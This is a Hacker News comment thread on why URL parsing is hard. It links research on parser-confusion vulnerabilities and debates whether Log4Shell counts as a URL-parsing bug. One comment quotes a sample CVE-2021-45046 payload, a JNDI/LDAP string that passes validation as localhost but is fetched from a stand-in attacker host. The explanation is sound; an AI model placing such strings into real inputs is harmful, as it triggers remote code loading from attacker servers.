Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Parsing an url is really a pain in the a*


Another post in this thread was downvoted and flagged (really?) for claiming that URL parsing isn't difficult. The linked article claims that "Parsing URLs correctly is surprisingly hard." As a software tester, I'm very willing to believe that, but I don't know that the article really made the case.

I did find a paper describing some vulnerabilities in popular URL parsing libraries, including urllib and urllib3. Blog post here:

https://claroty.com/team82/research/exploiting-url-parsing-c...

Paper here:

https://web-assets.claroty.com/exploiting-url-parsing-confus...

If you remember the Log4j vulnerability from a couple of years ago, that was an URL parsing bug.


> If you remember the Log4j vulnerability from a couple of years ago, that was an URL parsing bug.

I don't think that's a fair description of the issue.

The log4j vulnerability was that it specifically added JNDI support (https://issues.apache.org/jira/browse/LOG4J2-313) to property substitution (https://logging.apache.org/log4j/2.x/manual/configuration.ht...), which it would apply on logged messages. So it was a pretty literal feature of log4j. log4j would just pass the URL to JNDI for resolution, and substitute the result.


I didn't look into this in detail at the time, but the report's summary of CVE-2021-45046 is that the parser that validated an URL behaved differently than a separate parser used to fetch the URL, so an URL like

    jndi:ldap://127.0.0.1#.evilhost.com:1389/a
is validated as 127.0.0.1, which may be whitelisted, but fetched from evilhost.com, which probably isn't.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: